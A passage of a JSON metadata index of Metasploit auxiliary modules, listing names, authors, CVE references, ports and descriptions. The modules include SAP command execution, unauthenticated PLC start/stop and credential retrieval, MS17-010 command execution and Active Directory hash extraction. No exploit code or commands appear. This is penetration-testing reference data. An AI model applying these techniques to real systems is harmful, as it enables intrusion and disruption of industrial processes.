"rport": 5432,
"autofilter_ports": [
5432
],
"autofilter_services": [
"postgres"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/postgres/postgres_readfile.rb",
"is_install_path": true,
"ref_name": "admin/postgres/postgres_readfile",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/postgres/postgres_sql": {
"name": "PostgreSQL Server Generic Query",
"full_name": "auxiliary/admin/postgres/postgres_sql",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"todb <todb@metasploit.com>"
],
"description": "This module will allow for simple SQL statements to be executed against a\n PostgreSQL instance given the appropriate credentials.",
"references": [
"URL-www.postgresql.org"
],
"platform": "",
"arch": "",
"rport": 5432,
"autofilter_ports": [
5432
],
"autofilter_services": [
"postgres"
],
"targets": null,
"mod_time": "2017-08-24 21:38:44 +0000",
"path": "/modules/auxiliary/admin/postgres/postgres_sql.rb",
"is_install_path": true,
"ref_name": "admin/postgres/postgres_sql",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/sap/sap_configservlet_exec_noauth": {
"name": "SAP ConfigServlet OS Command Execution",
"full_name": "auxiliary/admin/sap/sap_configservlet_exec_noauth",
"rank": 300,
"disclosure_date": "2012-11-01",
"type": "auxiliary",
"author": [
"Dmitry Chastuhin",
"Andras Kabai"
],
"description": "This module allows execution of operating system commands through the SAP\n ConfigServlet without any authentication.",
"references": [
"OSVDB-92704",
"EDB-24963",
"URL-http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf"
],
"platform": "",
"arch": "",
"rport": 50000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb",
"is_install_path": true,
"ref_name": "admin/sap/sap_configservlet_exec_noauth",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/sap/sap_mgmt_con_osexec": {
"name": "SAP Management Console OSExecute",
"full_name": "auxiliary/admin/sap/sap_mgmt_con_osexec",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chris John Riley"
],
"description": "This module allows execution of operating system commands through the SAP\n Management Console SOAP Interface. A valid username and password must be\n provided.",
"references": [
"URL-http://blog.c22.cc"
],
"platform": "",
"arch": "",
"rport": 50013,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
50013
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb",
"is_install_path": true,
"ref_name": "admin/sap/sap_mgmt_con_osexec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/scada/advantech_webaccess_dbvisitor_sqli": {
"name": "Advantech WebAccess DBVisitor.dll ChartThemeConfig SQL Injection",
"full_name": "auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli",
"rank": 300,
"disclosure_date": "2014-04-08",
"type": "auxiliary",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a SQL injection vulnerability found in Advantech WebAccess 7.1. The\n vulnerability exists in the DBVisitor.dll component, and can be abused through malicious\n requests to the ChartThemeConfig web service. This module can be used to extract the site\n and project usernames and hashes.",
"references": [
"CVE-2014-0763",
"ZDI-14-077",
"OSVDB-105572",
"BID-66740",
"URL-https://ics-cert.us-cert.gov/advisories/ICSA-14-079-03"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb",
"is_install_path": true,
"ref_name": "admin/scada/advantech_webaccess_dbvisitor_sqli",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/scada/ge_proficy_substitute_traversal": {
"name": "GE Proficy Cimplicity WebView substitute.bcl Directory Traversal",
"full_name": "auxiliary/admin/scada/ge_proficy_substitute_traversal",
"rank": 300,
"disclosure_date": "2013-01-22",
"type": "auxiliary",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses a directory traversal in GE Proficy Cimplicity, specifically on the\n gefebt.exe component used by the WebView, in order to retrieve arbitrary files with SYSTEM\n privileges. This module has been tested successfully on GE Proficy Cimplicity 7.5.",
"references": [
"CVE-2013-0653",
"OSVDB-89490",
"BID-57505",
"URL-http://ics-cert.us-cert.gov/advisories/ICSA-13-022-02"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb",
"is_install_path": true,
"ref_name": "admin/scada/ge_proficy_substitute_traversal",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/scada/modicon_command": {
"name": "Schneider Modicon Remote START/STOP Command",
"full_name": "auxiliary/admin/scada/modicon_command",
"rank": 300,
"disclosure_date": "2012-04-05",
"type": "auxiliary",
"author": [
"K. Reid Wightman <wightman@digitalbond.com>",
"todb <todb@metasploit.com>"
],
"description": "The Schneider Modicon with Unity series of PLCs use Modbus function\n code 90 (0x5a) to perform administrative commands without authentication.\n This module allows a remote user to change the state of the PLC between\n STOP and RUN, allowing an attacker to end process control by the PLC.\n\n This module is based on the original 'modiconstop.rb' Basecamp module from\n DigitalBond.",
"references": [
"URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/"
],
"platform": "",
"arch": "",
"rport": 502,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/scada/modicon_command.rb",
"is_install_path": true,
"ref_name": "admin/scada/modicon_command",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/scada/modicon_password_recovery": {
"name": "Schneider Modicon Quantum Password Recovery",
"full_name": "auxiliary/admin/scada/modicon_password_recovery",
"rank": 300,
"disclosure_date": "2012-01-19",
"type": "auxiliary",
"author": [
"K. Reid Wightman <wightman@digitalbond.com>",
"todb <todb@metasploit.com>"
],
"description": "The Schneider Modicon Quantum series of Ethernet cards store usernames and\n passwords for the system in files that may be retrieved via backdoor access.\n\n This module is based on the original 'modiconpass.rb' Basecamp module from\n DigitalBond.",
"references": [
"URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/"
],
"platform": "",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/scada/modicon_password_recovery.rb",
"is_install_path": true,
"ref_name": "admin/scada/modicon_password_recovery",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/scada/modicon_stux_transfer": {
"name": "Schneider Modicon Ladder Logic Upload/Download",
"full_name": "auxiliary/admin/scada/modicon_stux_transfer",
"rank": 300,
"disclosure_date": "2012-04-05",
"type": "auxiliary",
"author": [
"K. Reid Wightman <wightman@digitalbond.com>",
"todb <todb@metasploit.com>"
],
"description": "The Schneider Modicon with Unity series of PLCs use Modbus function\n code 90 (0x5a) to send and receive ladder logic. The protocol is\n unauthenticated, and allows a rogue host to retrieve the existing\n logic and to upload new logic.\n\n Two modes are supported: \"SEND\" and \"RECV,\" which behave as one might\n expect -- use 'set mode ACTIONAME' to use either mode of operation.\n\n In either mode, FILENAME must be set to a valid path to an existing\n file (for SENDing) or a new file (for RECVing), and the directory must\n already exist. The default, 'modicon_ladder.apx' is a blank\n ladder logic file which can be used for testing.\n\n This module is based on the original 'modiconstux.rb' Basecamp module from\n DigitalBond.",
"references": [
"URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/"
],
"platform": "",
"arch": "",
"rport": 502,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/scada/modicon_stux_transfer.rb",
"is_install_path": true,
"ref_name": "admin/scada/modicon_stux_transfer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/scada/moxa_credentials_recovery": {
"name": "Moxa Device Credential Retrieval",
"full_name": "auxiliary/admin/scada/moxa_credentials_recovery",
"rank": 300,
"disclosure_date": "2015-07-28",
"type": "auxiliary",
"author": [
"Patrick DeSantis <p@t-r10t.com>",
"K. Reid Wightman <reid@revics-security.com>"
],
"description": "The Moxa protocol listens on 4800/UDP and will respond to broadcast\n or direct traffic. The service is known to be used on Moxa devices\n in the NPort, OnCell, and MGate product lines. Many devices with\n firmware versions older than 2017 or late 2016 allow admin credentials\n and SNMP read and read/write community strings to be retrieved without\n authentication.\n\n This module is the work of Patrick DeSantis of Cisco Talos and K. Reid\n Wightman.\n\n Tested on: Moxa NPort 6250 firmware v1.13, MGate MB3170 firmware 2.5,\n and NPort 5110 firmware 2.6.",
"references": [
"CVE-2016-9361",
"BID-85965",
"URL-https://www.digitalbond.com/blog/2016/10/25/serial-killers/",
"URL-https://github.com/reidmefirst/MoxaPass/blob/master/moxa_getpass.py",
"URL-https://ics-cert.us-cert.gov/advisories/ICSA-16-336-02"
],
"platform": "",
"arch": "",
"rport": 4800,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-10-10 17:56:17 +0000",
"path": "/modules/auxiliary/admin/scada/moxa_credentials_recovery.rb",
"is_install_path": true,
"ref_name": "admin/scada/moxa_credentials_recovery",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/scada/multi_cip_command": {
"name": "Allen-Bradley/Rockwell Automation EtherNet/IP CIP Commands",
"full_name": "auxiliary/admin/scada/multi_cip_command",
"rank": 300,
"disclosure_date": "2012-01-19",
"type": "auxiliary",
"author": [
"Ruben Santamarta <ruben@reversemode.com>",
"K. Reid Wightman <wightman@digitalbond.com>",
"todb <todb@metasploit.com>"
],
"description": "The EtherNet/IP CIP protocol allows a number of unauthenticated commands to a PLC which\n implements the protocol. This module implements the CPU STOP command, as well as\n the ability to crash the Ethernet card in an affected device.\n\n This module is based on the original 'ethernetip-multi.rb' Basecamp module\n from DigitalBond.",
"references": [
"URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/"
],
"platform": "",
"arch": "",
"rport": 44818,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-24 21:38:44 +0000",
"path": "/modules/auxiliary/admin/scada/multi_cip_command.rb",
"is_install_path": true,
"ref_name": "admin/scada/multi_cip_command",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/scada/pcom_command": {
"name": "Unitronics PCOM remote START/STOP/RESET command",
"full_name": "auxiliary/admin/scada/pcom_command",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Luis Rosa <lmrosa@dei.uc.pt>"
],
"description": "Unitronics Vision PLCs allow remote administrative functions to control\n the PLC using authenticated PCOM commands.\n\n This module supports START, STOP and RESET operations.",
"references": [
"URL-https://unitronicsplc.com/Download/SoftwareUtilities/Unitronics%20PCOM%20Protocol.pdf"
],
"platform": "",
"arch": "",
"rport": 20256,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-02-11 13:46:00 +0000",
"path": "/modules/auxiliary/admin/scada/pcom_command.rb",
"is_install_path": true,
"ref_name": "admin/scada/pcom_command",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/scada/phoenix_command": {
"name": "PhoenixContact PLC Remote START/STOP Command",
"full_name": "auxiliary/admin/scada/phoenix_command",
"rank": 300,
"disclosure_date": "2015-05-20",
"type": "auxiliary",
"author": [
"Tijl Deneut <tijl.deneut@howest.be>"
],
"description": "PhoenixContact Programmable Logic Controllers are built upon a variant of\n ProConOS. Communicating using a proprietary protocol over ports TCP/1962\n and TCP/41100 or TCP/20547.\n It allows a remote user to read out the PLC Type, Firmware and\n Build number on port TCP/1962.\n And also to read out the CPU State (Running or Stopped) AND start\n or stop the CPU on port TCP/41100 (confirmed ILC 15x and 17x series)\n or on port TCP/20547 (confirmed ILC 39x series)",
"references": [
"URL-https://github.com/tijldeneut/ICSSecurityScripts",
"CVE-2014-9195"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/scada/phoenix_command.rb",
"is_install_path": true,
"ref_name": "admin/scada/phoenix_command",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/scada/yokogawa_bkbcopyd_client": {
"name": "Yokogawa BKBCopyD.exe Client",
"full_name": "auxiliary/admin/scada/yokogawa_bkbcopyd_client",
"rank": 300,
"disclosure_date": "2014-08-09",
"type": "auxiliary",
"author": [
"Unknown"
],
"description": "This module allows an unauthenticated user to interact with the Yokogawa\n CENTUM CS3000 BKBCopyD.exe service through the PMODE, RETR and STOR\n operations.",
"references": [
"CVE-2014-5208",
"URL-https://community.rapid7.com/community/metasploit/blog/2014/08/09/r7-2014-10-disclosure-yokogawa-centum-cs3000-bkbcopydexe-file-system-access"
],
"platform": "",
"arch": "",
"rport": 20111,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-12-11 10:02:36 +0000",
"path": "/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb",
"is_install_path": true,
"ref_name": "admin/scada/yokogawa_bkbcopyd_client",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/serverprotect/file": {
"name": "TrendMicro ServerProtect File Access",
"full_name": "auxiliary/admin/serverprotect/file",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"toto"
],
"description": "This modules exploits a remote file access flaw in the ServerProtect Windows\n Server RPC service. Please see the action list (or the help output) for more\n information.",
"references": [
"CVE-2007-6507",
"OSVDB-44318",
"ZDI-07-077"
],
"platform": "",
"arch": "",
"rport": 5168,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/serverprotect/file.rb",
"is_install_path": true,
"ref_name": "admin/serverprotect/file",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/smb/check_dir_file": {
"name": "SMB Scanner Check File/Directory Utility",
"full_name": "auxiliary/admin/smb/check_dir_file",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>",
"j0hn__f"
],
"description": "This module is useful when checking an entire network\n of SMB hosts for the presence of a known file or directory.\n An example would be to scan all systems for the presence of\n antivirus or known malware outbreak. Typically you must set\n RPATH, SMBUser, SMBDomain and SMBPass to operate correctly.",
"references": [
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/admin/smb/check_dir_file.rb",
"is_install_path": true,
"ref_name": "admin/smb/check_dir_file",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/smb/delete_file": {
"name": "SMB File Delete Utility",
"full_name": "auxiliary/admin/smb/delete_file",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"mubix <mubix@hak5.org>"
],
"description": "This module deletes a file from a target share and path. The usual reason\n to use this module is to work around limitations in an existing SMB client that may not\n be able to take advantage of pass-the-hash style authentication.",
"references": [
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/smb/delete_file.rb",
"is_install_path": true,
"ref_name": "admin/smb/delete_file",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/smb/download_file": {
"name": "SMB File Download Utility",
"full_name": "auxiliary/admin/smb/download_file",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"mubix <mubix@hak5.org>"
],
"description": "This module downloads a file from a target share and path. The usual reason\n to use this module is to work around limitations in an existing SMB client that may not\n be able to take advantage of pass-the-hash style authentication.",
"references": [
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2018-05-07 00:13:11 +0000",
"path": "/modules/auxiliary/admin/smb/download_file.rb",
"is_install_path": true,
"ref_name": "admin/smb/download_file",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/smb/list_directory": {
"name": "SMB Directory Listing Utility",
"full_name": "auxiliary/admin/smb/list_directory",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"mubix <mubix@hak5.org>",
"hdm <x@hdm.io>"
],
"description": "This module lists the directory of a target share and path. The only reason\n to use this module is if your existing SMB client is not able to support the features\n of the Metasploit Framework that you need, like pass-the-hash authentication.",
"references": [
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/smb/list_directory.rb",
"is_install_path": true,
"ref_name": "admin/smb/list_directory",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/smb/ms17_010_command": {
"name": "MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution",
"full_name": "auxiliary/admin/smb/ms17_010_command",
"rank": 300,
"disclosure_date": "2017-03-14",
"type": "auxiliary",
"author": [
"sleepya",
"zerosum0x0",
"Shadow Brokers",
"Equation Group"
],
"description": "This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where\n primitive. This will then be used to overwrite the connection session information with as an\n Administrator session. From there, the normal psexec command execution is done.\n\n Exploits a type confusion between Transaction and WriteAndX requests and a race condition in\n Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy\n exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a\n named pipe.",
"references": [
"MSB-MS17-010",
"CVE-2017-0143",
"CVE-2017-0146",
"CVE-2017-0147",
"URL-https://github.com/worawit/MS17-010",
"URL-https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf",
"URL-https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/admin/smb/ms17_010_command.rb",
"is_install_path": true,
"ref_name": "admin/smb/ms17_010_command",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"ETERNALSYNERGY",
"ETERNALROMANCE",
"ETERNALCHAMPION",
"ETERNALBLUE"
]
}
},
"auxiliary_admin/smb/psexec_command": {
"name": "Microsoft Windows Authenticated Administration Utility",
"full_name": "auxiliary/admin/smb/psexec_command",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Royce Davis @R3dy__ <rdavis@accuvant.com>"
],
"description": "This module uses a valid administrator username and password to execute an\n arbitrary command on one or more hosts, using a similar technique than the \"psexec\"\n utility provided by SysInternals. Daisy chaining commands with '&' does not work\n and users shouldn't try it. This module is useful because it doesn't need to upload\n any binaries to the target machine.",
"references": [
"CVE-1999-0504",
"OSVDB-3106",
"URL-https://www.optiv.com/blog/owning-computers-without-shell-access",
"URL-http://sourceforge.net/projects/smbexec/",
"URL-http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/admin/smb/psexec_command.rb",
"is_install_path": true,
"ref_name": "admin/smb/psexec_command",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/smb/psexec_ntdsgrab": {
"name": "PsExec NTDS.dit And SYSTEM Hive Download Utility",
"full_name": "auxiliary/admin/smb/psexec_ntdsgrab",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Royce Davis <rdavis@accuvant.com>"
],
"description": "This module authenticates to an Active Directory Domain Controller and creates\n a volume shadow copy of the %SYSTEMDRIVE%. It then pulls down copies of the\n ntds.dit file as well as the SYSTEM hive and stores them. The ntds.dit and SYSTEM\n hive copy can be used in combination with other tools for offline extraction of AD\n password hashes. All of this is done without uploading a single binary to the\n target host.",
"references": [
"URL-http://sourceforge.net/projects/smbexec",
"URL-https://www.optiv.com/blog/owning-computers-without-shell-access"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2017-08-01 22:39:14 +0000",
"path": "/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb",
"is_install_path": true,
"ref_name": "admin/smb/psexec_ntdsgrab",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/smb/samba_symlink_traversal": {
"name": "Samba Symlink Directory Traversal",
"full_name": "auxiliary/admin/smb/samba_symlink_traversal",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"kcope",
"hdm <x@hdm.io>"
],
"description": "This module exploits a directory traversal flaw in the Samba\n CIFS server. To exploit this flaw, a writeable share must be specified.\n The newly created directory will link to the root filesystem.",
"references": [
"CVE-2010-0926",
"OSVDB-62145",
"URL-http://www.samba.org/samba/news/symlink_attack.html"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/auxiliary/admin/smb/samba_symlink_traversal.rb",
"is_install_path": true,
"ref_name": "admin/smb/samba_symlink_traversal",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/smb/upload_file": {
"name": "SMB File Upload Utility",
"full_name": "auxiliary/admin/smb/upload_file",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module uploads a file to a target share and path. The only reason\n to use this module is if your existing SMB client is not able to support the features\n of the Metasploit Framework that you need, like pass-the-hash authentication.",
"references": [
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2018-05-07 00:13:11 +0000",
"path": "/modules/auxiliary/admin/smb/upload_file.rb",
"is_install_path": true,
"ref_name": "admin/smb/upload_file",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/smb/webexec_command": {
"name": "WebEx Remote Command Execution Utility",
"full_name": "auxiliary/admin/smb/webexec_command",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Ron Bowes <ron@skullsecurity.net>"
],
"description": "This module enables the execution of a single command as System by exploiting a remote\n code execution vulnerability in Cisco's WebEx client software.",
"references": [
"URL-https://webexec.org",
"CVE-2018-15442"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2018-10-24 16:18:17 +0000",
"path": "/modules/auxiliary/admin/smb/webexec_command.rb",
"is_install_path": true,
"ref_name": "admin/smb/webexec_command",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/sunrpc/solaris_kcms_readfile": {
"name": "Solaris KCMS + TTDB Arbitrary File Read",
"full_name": "auxiliary/admin/sunrpc/solaris_kcms_readfile",
"rank": 300,
"disclosure_date": "2003-01-22",
"type": "auxiliary",
"author": [
"vlad902 <vlad902@gmail.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module targets a directory traversal vulnerability in the\n kcms_server component from the Kodak Color Management System. By\n utilizing the ToolTalk Database Server\\'s TT_ISBUILD procedure, an\n attacker can bypass existing directory traversal validation and\n read arbitrary files.\n\n Vulnerable systems include Solaris 2.5 - 9 SPARC and x86. Both\n kcms_server and rpc.ttdbserverd must be running on the target\n host.",
"references": [
"CVE-2003-0027",
"OSVDB-8201",
"BID-6665",
"URL-http://marc.info/?l=bugtraq&m=104326556329850&w=2"
],
"platform": "",
"arch": "",
"rport": 111,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb",
"is_install_path": true,
"ref_name": "admin/sunrpc/solaris_kcms_readfile",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/teradata/teradata_odbc_sql": {
"name": "Teradata ODBC SQL Query Module",
"full_name": "auxiliary/admin/teradata/teradata_odbc_sql",
"rank": 300,
"disclosure_date": "2018-03-29",
"type": "auxiliary",
"author": [
"Ted Raffle (actuated)"
],
"description": "SQL query module for ODBC connections to local Teradata databases.\n\n Port specification (TCP 1025 by default) is not necessary for ODBC connections.\n\n Requires ODBC driver and Python Teradata module.",
"references": [
"URL-https://developer.teradata.com/tools/reference/teradata-python-module",
"URL-https://downloads.teradata.com/download/connectivity/odbc-driver/linux"
],
"platform": "",
"arch": "",
"rport": 1025,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-09-13 13:09:01 +0000",
"path": "/modules/auxiliary/admin/teradata/teradata_odbc_sql.py",
"is_install_path": true,
"ref_name": "admin/teradata/teradata_odbc_sql",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
"AKA": [
"Teradata ODBC Authentication Scanner"
]
}
},
"auxiliary_admin/tftp/tftp_transfer_util": {
"name": "TFTP File Transfer Utility",
"full_name": "auxiliary/admin/tftp/tftp_transfer_util",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"todb <todb@metasploit.com>"
],
"description": "This module will transfer a file to or from a remote TFTP server.\n Note that the target must be able to connect back to the Metasploit system,\n and NAT traversal for TFTP is often unsupported.\n\n Two actions are supported: \"Upload\" and \"Download,\" which behave as one might\n expect -- use 'set action Actionname' to use either mode of operation.\n\n If \"Download\" is selected, at least one of FILENAME or REMOTE_FILENAME\n must be set. If \"Upload\" is selected, either FILENAME must be set to a valid path to\n a source file, or FILEDATA must be populated. FILENAME may be a fully qualified path,\n or the name of a file in the Msf::Config.local_directory or Msf::Config.data_directory.",
"references": [
"URL-http://www.faqs.org/rfcs/rfc1350.html",
"URL-http://www.networksorcery.com/enp/protocol/tftp.htm"
],
"platform": "",
"arch": "",
"rport": 69,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/tftp/tftp_transfer_util.rb",
"is_install_path": true,
"ref_name": "admin/tftp/tftp_transfer_util",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/tikiwiki/tikidblib": {
"name": "TikiWiki Information Disclosure",
"full_name": "auxiliary/admin/tikiwiki/tikidblib",
"rank": 300,
"disclosure_date": "2006-11-01",
"type": "auxiliary",
"author": [
"Matteo Cantoni <goony@nothink.org>"
],
"description": "A vulnerability has been reported in Tikiwiki, which can be exploited by\n an anonymous user to dump the MySQL user & passwd just by creating a mysql\n error with the \"sort_mode\" var.\n\n The vulnerability was reported in Tikiwiki version 1.9.5.",
"references": [
"OSVDB-30172",
"BID-20858",
"CVE-2006-5702",
"URL-http://secunia.com/advisories/22678/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-24 21:38:44 +0000",
"path": "/modules/auxiliary/admin/tikiwiki/tikidblib.rb",
"is_install_path": true,
"ref_name": "admin/tikiwiki/tikidblib",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/upnp/soap_portmapping": {
"name": "UPnP IGD SOAP Port Mapping Utility",
"full_name": "auxiliary/admin/upnp/soap_portmapping",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"St0rn <fabien@anbu-pentest.com>",
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "Manage port mappings on UPnP IGD-capable device using the AddPortMapping and\n DeletePortMapping SOAP requests",
"references": [
"URL-http://www.upnp-hacks.org/igd.html"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
